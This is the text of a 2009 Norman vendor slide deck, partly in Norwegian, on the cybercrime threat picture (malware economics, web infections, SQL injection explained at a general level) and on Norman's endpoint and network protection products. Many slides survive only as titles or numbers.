Trusselbildet 2009 (og noen løsninger ) Øivind Barbo Corp. Prod. Marketing Manager 2/8/2009
The marked FBI: e-crime now bigger than narcotics* 2008 was the year where it is was produced more malware than legitimate applications Big business driven by profit Innovation to capture new markets (victims) Special designed Malware : $ 250 Personal information : $ 5 Credit card : 2-5% of credit limit Russian malware writers can make $10.000 a day * U.S. Government Accountability Office, Cybercrime: Public and Private Entities Face Challenges in Addressing Cyber Threats, June 2007. 2/8/2009
Evolution of malware used in e-crime 3
Access Control And Firewall IDS/IPS Application Firewall DoS The Enterprise The Internet Antispoofing Web Server know vulnerabilities Parameter Tampering Cross Site Scripting Web Server Application Server Databases Backend Server Port Scanning Pattern- Based Attacks SQL Injection Cookie Poisoning User Identification Access Control Encrypted transport of data Firewall Universal threat management Anomaly detection Intrusion prevention Vulnerability management Remediation/Patching Compliance and risk management Host protection (server and desktop) Layer 4 7 protection (content, URL, Web) Content Control Data Leakage management
Threat picture Norman Areas People Malware - Trojan Horse -Virus -Spyware - Botnets - Spam Enemy - - Attackers - Criminals - Terrorists - Foreign states - Means - Tools - Methods Social engineering Social manipulation Vulnerabilities Security holes Technology Target - Money - Information
How infections happens Web access - all types of sites Attachments are becoming more infrequent. Uses exploits that cause browsers to autodownload and execute files. Web sites infected by SQL injection attacks 6
SQL injection Inject malicious text into web pages by inserting malformed statements into web forms, confusing the web database in the background. Many websites vulnerable. Used for inserting links to malicious websites into normally innocent webpages. Pages often become half-corrupted, with links in strange places like in title fields etc. 7
8
2/8/2009 I pressen
11
12
13
14
15
16
Targeted attacks MONEY
Norman signatur Database 250% growth (despite focus on generic signatures) 1 year
Antivirus protection Clients FileServers WebServers Mailservers Other servers Network Realtime scanning most used protocols Spamfiltering 2/8/2009
Norman Endpoint Manager A completely new application for managing Norman Endpoint Protection in network installations
Norman Endpoint Manager - Enkel å bruke - Enkelt å administrere klienter - Benytter lite systemressurser - Rask oversikt over nettverksstatus - AV utrulling/oppgradering - Unik network discovery - Finner ALLE enheter i nettverket - uansett type 08.02.2009
NEM overview NEM controls updates NEM controls policies NEM controls cleaning process NEM controls delta values (no. of nodes with alarms/errors/warnings) Who controls NEM? 2/8/2009
2/8/2009 Integration with SiteScope
2/8/2009 Integration with BAC
2/8/2009 Integration development
ucmdb integrasjon BUSINESS TECHNOLOGY OPTIMIZATION Configuration Management Data Center Consolidation What-If Analysis Policy Compliance Custom Apps J2EE SAP Siebel Oracle E-Business DB OSNT NT Application Modeling Universal CMDB Other DISCOVERY 2/8/2009 Switches/Routers CRM/ERP Servers Files Databases Applications
Malware spread vector : widely used ports CIFS/SMB RPC
Norman Network Protection dataflow dataflow dataflow No IP No IP Protected network IP Other network Administrator Transparent i nettverket Skanner inn- og utgående trafikk Minimal tidsforsinkelse (latency) Skanner internt (cifs/smb) og eksternt (http/ftp/pop...) protokoller Holder nettverket og nettverksenhetene rene Isolerer infiserte kilder Bevarer oppetid og tilgjengelighet 08.02.2009
08.02.2009 Norman Network Protection i nettverket
08.02.2009 Scan preferanser pr. protokoll
Trafikk oversikt og statistikker Detaljert oversikt over: Protokoll typer Mest aktive IP-addresser Trafikkhistogram pr. dag, måned eller egendefinert Reverse DNS lookup Loggfil kan lastes ned 08.02.2009
08.02.2009 Incident statistikker
08.02.2009 Blokkerte URL er
Incident log Sandbox Analyse Malware tas i karantene, og en SandBox Malware analyse gir en komplett dybdeanalyse av potensiell adferd Trykk her for SandBox Analyse 08.02.2009
08.02.2009
NNP HW eller f.eks HP DL360/380. NNP er et software produkt 2/8/2009
Avoid infections User training (MSN, unknown pop-up s, e-mail, etc. ) Patch management Anti-virus management Activated, according to policies Up-to-date def. files Discovery of unknown nodes in the network Alerts Network traffic content scanning
2/8/2009 Den farligste trusselen..
email: oba@norman.com